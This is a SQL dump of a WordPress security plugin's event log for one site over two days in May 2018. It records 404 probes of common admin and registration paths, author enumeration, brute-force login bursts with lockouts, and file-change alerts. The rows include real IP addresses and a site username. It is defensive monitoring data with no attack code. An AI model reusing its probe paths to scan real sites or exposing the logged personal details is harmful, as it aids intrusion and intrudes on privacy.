(86858, 'four_oh_four', '404 Error', 3, '2018-05-02 03:44:46', '2018-05-02 08:44:46', '73.124.255.149', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86857, 'four_oh_four', '404 Error', 3, '2018-05-02 03:34:43', '2018-05-02 08:34:43', '176.240.165.49', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86856, 'four_oh_four', '404 Error', 3, '2018-05-02 03:34:34', '2018-05-02 08:34:34', '176.240.165.49', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86855, 'four_oh_four', '404 Error', 3, '2018-05-02 03:34:29', '2018-05-02 08:34:29', '176.240.165.49', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86854, 'four_oh_four', '404 Error', 3, '2018-05-02 03:34:21', '2018-05-02 08:34:21', '176.240.165.49', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(86853, 'four_oh_four', '404 Error', 3, '2018-05-02 03:34:11', '2018-05-02 08:34:11', '176.240.165.49', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86852, 'four_oh_four', '404 Error', 3, '2018-05-02 03:33:57', '2018-05-02 08:33:57', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86851, 'four_oh_four', '404 Error', 3, '2018-05-02 03:33:56', '2018-05-02 08:33:56', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86850, 'four_oh_four', '404 Error', 3, '2018-05-02 03:33:56', '2018-05-02 08:33:56', '176.240.165.49', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86849, 'four_oh_four', '404 Error', 3, '2018-05-02 02:45:38', '2018-05-02 07:45:38', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86848, 'four_oh_four', '404 Error', 3, '2018-05-02 02:39:14', '2018-05-02 07:39:14', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86847, 'four_oh_four', '404 Error', 3, '2018-05-02 02:11:26', '2018-05-02 07:11:26', '93.138.122.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86846, 'four_oh_four', '404 Error', 3, '2018-05-02 02:06:48', '2018-05-02 07:06:48', '78.58.143.166', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86845, 'four_oh_four', '404 Error', 3, '2018-05-02 02:06:19', '2018-05-02 07:06:19', '191.101.112.178', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86844, 'four_oh_four', '404 Error', 3, '2018-05-02 02:06:12', '2018-05-02 07:06:12', '191.101.112.178', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86842, 'four_oh_four', '404 Error', 3, '2018-05-02 01:38:24', '2018-05-02 06:38:24', '211.171.168.233', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86843, 'four_oh_four', '404 Error', 3, '2018-05-02 01:51:15', '2018-05-02 06:51:15', '93.158.161.54', '', 0, '/blog/page/74/marcopoloslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86841, 'four_oh_four', '404 Error', 3, '2018-05-02 01:22:21', '2018-05-02 06:22:21', '141.8.144.13', '', 0, '/blog/page/76/zolotoslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86840, 'four_oh_four', '404 Error', 3, '2018-05-02 01:22:18', '2018-05-02 06:22:18', '5.255.250.134', '', 0, '/blog/page/76/zolotoslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86839, 'four_oh_four', '404 Error', 3, '2018-05-02 01:18:20', '2018-05-02 06:18:20', '101.255.45.22', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86838, 'four_oh_four', '404 Error', 3, '2018-05-02 01:18:18', '2018-05-02 06:18:18', '101.255.45.22', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86837, 'four_oh_four', '404 Error', 3, '2018-05-02 01:03:29', '2018-05-02 06:03:29', '182.186.55.116', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86836, 'four_oh_four', '404 Error', 3, '2018-05-02 01:03:27', '2018-05-02 06:03:27', '182.186.55.116', '', 0, '/not_found', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(86835, 'four_oh_four', '404 Error', 3, '2018-05-02 00:24:19', '2018-05-02 05:24:19', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86834, 'four_oh_four', '404 Error', 3, '2018-05-02 00:12:00', '2018-05-02 05:12:00', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86833, 'lockout', 'Host or User Lockout', 10, '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 00:09:32";s:11:"expires_gmt";s:19:"2018-05-02 05:09:32";s:4:"type";s:11:"brute_force";}'),
(86832, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', 'heyrossbutcher', 0, '', '', 'a:0:{}'),
(86831, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', 'heyrossbutcher', 0, '', '', 'a:0:{}'),
(86829, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', 'heyrossbutcher', 0, '', '', 'a:0:{}'),
(86830, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:54:32', '2018-05-02 04:54:32', '109.86.115.141', 'heyrossbutcher', 0, '', '', 'a:0:{}'),
(86828, 'four_oh_four', '404 Error', 3, '2018-05-01 23:54:31', '2018-05-02 04:54:31', '109.86.115.141', '', 0, '/', '', 'a:1:{s:12:"query_string";s:8:"author=1";}'),
(86827, 'four_oh_four', '404 Error', 3, '2018-05-01 23:48:46', '2018-05-02 04:48:46', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86826, 'four_oh_four', '404 Error', 3, '2018-05-01 23:43:37', '2018-05-02 04:43:37', '5.255.250.77', '', 0, '/blog/page/75/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86825, 'four_oh_four', '404 Error', 3, '2018-05-01 23:40:43', '2018-05-02 04:40:43', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(86824, 'four_oh_four', '404 Error', 3, '2018-05-01 23:12:11', '2018-05-02 04:12:11', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86823, 'lockout', 'Host or User Lockout', 10, '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-01 23:27:08";s:11:"expires_gmt";s:19:"2018-05-02 04:27:08";s:4:"type";s:11:"brute_force";}'),
(86822, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', 'admin', 0, '', '', 'a:0:{}'),
(86821, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', 'admin', 0, '', '', 'a:0:{}'),
(86820, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', 'admin', 0, '', '', 'a:0:{}'),
(86819, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', 'admin', 0, '', '', 'a:0:{}'),
(86818, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-01 23:12:08', '2018-05-02 04:12:08', '162.247.72.199', 'admin', 0, '', '', 'a:0:{}'),
(86817, 'four_oh_four', '404 Error', 3, '2018-05-01 22:53:18', '2018-05-02 03:53:18', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86816, 'four_oh_four', '404 Error', 3, '2018-05-01 22:37:28', '2018-05-02 03:37:28', '108.46.181.160', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86815, 'four_oh_four', '404 Error', 3, '2018-05-01 22:12:08', '2018-05-02 03:12:08', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86814, 'four_oh_four', '404 Error', 3, '2018-05-01 22:00:21', '2018-05-02 03:00:21', '186.89.75.146', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86813, 'four_oh_four', '404 Error', 3, '2018-05-01 22:00:03', '2018-05-02 03:00:03', '186.89.75.146', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86812, 'four_oh_four', '404 Error', 3, '2018-05-01 21:20:52', '2018-05-02 02:20:52', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86811, 'four_oh_four', '404 Error', 3, '2018-05-01 20:05:12', '2018-05-02 01:05:12', '198.154.81.43', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86810, 'four_oh_four', '404 Error', 3, '2018-05-01 20:05:10', '2018-05-02 01:05:10', '198.154.81.43', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86809, 'four_oh_four', '404 Error', 3, '2018-05-01 20:03:56', '2018-05-02 01:03:56', '207.46.13.103', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86808, 'four_oh_four', '404 Error', 3, '2018-05-01 19:48:40', '2018-05-02 00:48:40', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86807, 'four_oh_four', '404 Error', 3, '2018-05-01 19:48:39', '2018-05-02 00:48:39', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86806, 'four_oh_four', '404 Error', 3, '2018-05-01 19:04:36', '2018-05-02 00:04:36', '104.148.118.12', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86805, 'four_oh_four', '404 Error', 3, '2018-05-01 19:04:35', '2018-05-02 00:04:35', '104.148.118.12', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86804, 'four_oh_four', '404 Error', 3, '2018-05-01 18:39:57', '2018-05-01 23:39:57', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86803, 'four_oh_four', '404 Error', 3, '2018-05-01 18:35:43', '2018-05-01 23:35:43', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86802, 'four_oh_four', '404 Error', 3, '2018-05-01 17:55:18', '2018-05-01 22:55:18', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86801, 'four_oh_four', '404 Error', 3, '2018-05-01 17:20:29', '2018-05-01 22:20:29', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86800, 'four_oh_four', '404 Error', 3, '2018-05-01 17:18:35', '2018-05-01 22:18:35', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86799, 'file_change', 'File Changes Detected', 8, '2018-05-01 17:01:26', '2018-05-01 22:01:26', '', '', 0, '', '', 'a:4:{s:5:"added";a:1:{s:107:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_int_da3dd9c2c453b9ea3d036598abfb8e7d.timthumb.txt";a:2:{s:1:"d";s:10:"1525145126";s:1:"h";s:32:"3143ce3085b9cdcd92bd4c8754ec4daa";}}s:7:"removed";a:0:{}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1525145126";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1525139400";}}s:6:"memory";s:5:"39.41";}'),
(86957, 'four_oh_four', '404 Error', 3, '2018-05-02 16:32:00', '2018-05-02 21:32:00', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86958, 'four_oh_four', '404 Error', 3, '2018-05-02 16:42:46', '2018-05-02 21:42:46', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86959, 'file_change', 'File Changes Detected', 8, '2018-05-02 17:01:46', '2018-05-02 22:01:46', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:5:"25.43";}'),
(86960, 'four_oh_four', '404 Error', 3, '2018-05-02 17:08:56', '2018-05-02 22:08:56', '197.158.17.65', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86961, 'four_oh_four', '404 Error', 3, '2018-05-02 17:14:54', '2018-05-02 22:14:54', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86962, 'four_oh_four', '404 Error', 3, '2018-05-02 17:17:38', '2018-05-02 22:17:38', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86963, 'four_oh_four', '404 Error', 3, '2018-05-02 17:24:55', '2018-05-02 22:24:55', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86964, 'four_oh_four', '404 Error', 3, '2018-05-02 17:34:46', '2018-05-02 22:34:46', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86965, 'four_oh_four', '404 Error', 3, '2018-05-02 17:57:49', '2018-05-02 22:57:49', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86966, 'four_oh_four', '404 Error', 3, '2018-05-02 18:11:14', '2018-05-02 23:11:14', '111.206.221.35', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css?ver=4.8.6', 'a:1:{s:12:"query_string";s:0:"";}'),
(86967, 'four_oh_four', '404 Error', 3, '2018-05-02 18:20:50', '2018-05-02 23:20:50', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86968, 'four_oh_four', '404 Error', 3, '2018-05-02 19:03:55', '2018-05-03 00:03:55', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86969, 'four_oh_four', '404 Error', 3, '2018-05-02 19:03:57', '2018-05-03 00:03:57', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86970, 'four_oh_four', '404 Error', 3, '2018-05-02 19:03:59', '2018-05-03 00:03:59', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86971, 'four_oh_four', '404 Error', 3, '2018-05-02 19:04:00', '2018-05-03 00:04:00', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86972, 'four_oh_four', '404 Error', 3, '2018-05-02 19:26:44', '2018-05-03 00:26:44', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86973, 'four_oh_four', '404 Error', 3, '2018-05-02 19:36:52', '2018-05-03 00:36:52', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86974, 'four_oh_four', '404 Error', 3, '2018-05-02 19:43:00', '2018-05-03 00:43:00', '77.88.5.31', '', 0, '/blog/page/76/gmblslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86975, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', 'admin', 0, '', '', 'a:0:{}'),
(86976, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', 'admin', 0, '', '', 'a:0:{}'),
(86977, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', 'admin', 0, '', '', 'a:0:{}'),
(86978, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', 'admin', 0, '', '', 'a:0:{}'),
(86979, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', 'admin', 0, '', '', 'a:0:{}'),
(86980, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', 'admin', 0, '', '', 'a:0:{}'),
(86981, 'lockout', 'Host or User Lockout', 10, '2018-05-02 19:46:42', '2018-05-03 00:46:42', '185.83.215.28', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 20:01:42";s:11:"expires_gmt";s:19:"2018-05-03 01:01:42";s:4:"type";s:11:"brute_force";}'),
(86982, 'four_oh_four', '404 Error', 3, '2018-05-02 19:53:50', '2018-05-03 00:53:50', '100.43.85.173', '', 0, '/blog/page/76/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86983, 'four_oh_four', '404 Error', 3, '2018-05-02 19:53:54', '2018-05-03 00:53:54', '77.88.5.31', '', 0, '/blog/page/76/supergoldslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86984, 'four_oh_four', '404 Error', 3, '2018-05-02 19:54:15', '2018-05-03 00:54:15', '93.158.161.108', '', 0, '/blog/page/76/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86985, 'four_oh_four', '404 Error', 3, '2018-05-02 20:15:03', '2018-05-03 01:15:03', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86986, 'four_oh_four', '404 Error', 3, '2018-05-02 20:15:55', '2018-05-03 01:15:55', '64.62.252.163', '', 0, '/', '', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86987, 'four_oh_four', '404 Error', 3, '2018-05-02 20:18:24', '2018-05-03 01:18:24', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86988, 'four_oh_four', '404 Error', 3, '2018-05-02 20:41:17', '2018-05-03 01:41:17', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86989, 'four_oh_four', '404 Error', 3, '2018-05-02 20:45:44', '2018-05-03 01:45:44', '202.142.172.10', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86990, 'four_oh_four', '404 Error', 3, '2018-05-02 20:45:45', '2018-05-03 01:45:45', '202.142.172.10', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86991, 'four_oh_four', '404 Error', 3, '2018-05-02 21:16:01', '2018-05-03 02:16:01', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86992, 'four_oh_four', '404 Error', 3, '2018-05-02 21:16:02', '2018-05-03 02:16:02', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86993, 'four_oh_four', '404 Error', 3, '2018-05-02 21:16:05', '2018-05-03 02:16:05', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86994, 'four_oh_four', '404 Error', 3, '2018-05-02 21:16:05', '2018-05-03 02:16:05', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86995, 'four_oh_four', '404 Error', 3, '2018-05-02 21:16:29', '2018-05-03 02:16:29', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86996, 'four_oh_four', '404 Error', 3, '2018-05-02 21:18:42', '2018-05-03 02:18:42', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86997, 'four_oh_four', '404 Error', 3, '2018-05-02 21:29:02', '2018-05-03 02:29:02', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86998, 'four_oh_four', '404 Error', 3, '2018-05-02 22:42:57', '2018-05-03 03:42:57', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86999, 'four_oh_four', '404 Error', 3, '2018-05-02 22:54:31', '2018-05-03 03:54:31', '52.174.148.147', '', 0, '/', '', 'a:1:{s:12:"query_string";s:8:"author=1";}'),
(87000, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', 'admin', 0, '', '', 'a:0:{}'),
(87001, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', 'admin', 0, '', '', 'a:0:{}'),
(87002, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', 'admin', 0, '', '', 'a:0:{}'),
(87003, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', 'admin', 0, '', '', 'a:0:{}'),
(87004, 'lockout', 'Host or User Lockout', 10, '2018-05-02 22:54:33', '2018-05-03 03:54:33', '52.174.148.147', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-02 23:09:33";s:11:"expires_gmt";s:19:"2018-05-03 04:09:33";s:4:"type";s:11:"brute_force";}'),
(87005, 'four_oh_four', '404 Error', 3, '2018-05-02 23:05:57', '2018-05-03 04:05:57', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87006, 'four_oh_four', '404 Error', 3, '2018-05-02 23:08:34', '2018-05-03 04:08:34', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87007, 'four_oh_four', '404 Error', 3, '2018-05-02 23:15:13', '2018-05-03 04:15:13', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87008, 'four_oh_four', '404 Error', 3, '2018-05-02 23:18:37', '2018-05-03 04:18:37', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87009, 'four_oh_four', '404 Error', 3, '2018-05-02 23:24:37', '2018-05-03 04:24:37', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87010, 'four_oh_four', '404 Error', 3, '2018-05-03 00:01:45', '2018-05-03 05:01:45', '5.157.37.165', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(87011, 'four_oh_four', '404 Error', 3, '2018-05-03 00:01:46', '2018-05-03 05:01:46', '5.157.37.165', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(87012, 'four_oh_four', '404 Error', 3, '2018-05-03 00:11:48', '2018-05-03 05:11:48', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87013, 'four_oh_four', '404 Error', 3, '2018-05-03 00:12:42', '2018-05-03 05:12:42', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87014, 'four_oh_four', '404 Error', 3, '2018-05-03 00:14:38', '2018-05-03 05:14:38', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87015, 'four_oh_four', '404 Error', 3, '2018-05-03 00:16:47', '2018-05-03 05:16:47', '103.81.77.151', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87016, 'four_oh_four', '404 Error', 3, '2018-05-03 00:29:25', '2018-05-03 05:29:25', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87017, 'four_oh_four', '404 Error', 3, '2018-05-03 00:37:36', '2018-05-03 05:37:36', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(87018, 'four_oh_four', '404 Error', 3, '2018-05-03 00:37:37', '2018-05-03 05:37:37', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://www.globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(87019, 'four_oh_four', '404 Error', 3, '2018-05-03 00:54:20', '2018-05-03 05:54:20', '207.46.13.216', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87020, 'four_oh_four', '404 Error', 3, '2018-05-03 01:02:08', '2018-05-03 06:02:08', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87021, 'four_oh_four', '404 Error', 3, '2018-05-03 01:03:20', '2018-05-03 06:03:20', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87022, 'four_oh_four', '404 Error', 3, '2018-05-03 01:46:23', '2018-05-03 06:46:23', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87023, 'four_oh_four', '404 Error', 3, '2018-05-03 01:49:09', '2018-05-03 06:49:09', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87024, 'four_oh_four', '404 Error', 3, '2018-05-03 02:11:02', '2018-05-03 07:11:02', '46.161.9.71', '', 0, '/express-the-operation-of-increase-of-the-business-11/', 'http://clearyourbeliefs.com/express-the-operation-of-increase-of-the-business-11/', 'a:1:{s:12:"query_string";s:0:"";}'),
(87025, 'four_oh_four', '404 Error', 3, '2018-05-03 02:14:13', '2018-05-03 07:14:13', '66.249.69.96', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87026, 'four_oh_four', '404 Error', 3, '2018-05-03 02:20:21', '2018-05-03 07:20:21', '100.43.85.173', '', 0, '/blog/page/75/supergoldslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87027, 'four_oh_four', '404 Error', 3, '2018-05-03 02:37:09', '2018-05-03 07:37:09', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87028, 'four_oh_four', '404 Error', 3, '2018-05-03 02:57:44', '2018-05-03 07:57:44', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87029, 'four_oh_four', '404 Error', 3, '2018-05-03 03:24:53', '2018-05-03 08:24:53', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87030, 'four_oh_four', '404 Error', 3, '2018-05-03 03:24:54', '2018-05-03 08:24:54', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87031, 'four_oh_four', '404 Error', 3, '2018-05-03 03:24:57', '2018-05-03 08:24:57', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87032, 'four_oh_four', '404 Error', 3, '2018-05-03 03:24:58', '2018-05-03 08:24:58', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87033, 'four_oh_four', '404 Error', 3, '2018-05-03 03:31:26', '2018-05-03 08:31:26', '5.101.99.155', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
